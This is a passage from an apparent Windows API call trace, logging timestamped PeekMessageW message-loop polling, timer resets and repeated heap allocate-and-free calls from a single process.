lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.975] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.976] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.977] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.978] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0135.979] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.115] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.115] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.115] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.116] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.117] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.118] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.119] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.119] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.119] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.676] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0136.676] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0136.676] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0136.677] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0136.677] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.677] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0136.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0136.678] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0136.678] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0136.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0136.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.678] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.678] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0136.678] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0136.679] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491898 [0136.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491898 | out: hHeap=0x12c0000) returned 1 [0136.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0136.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0136.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0136.679] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.679] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0136.679] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0136.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0136.679] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0136.680] 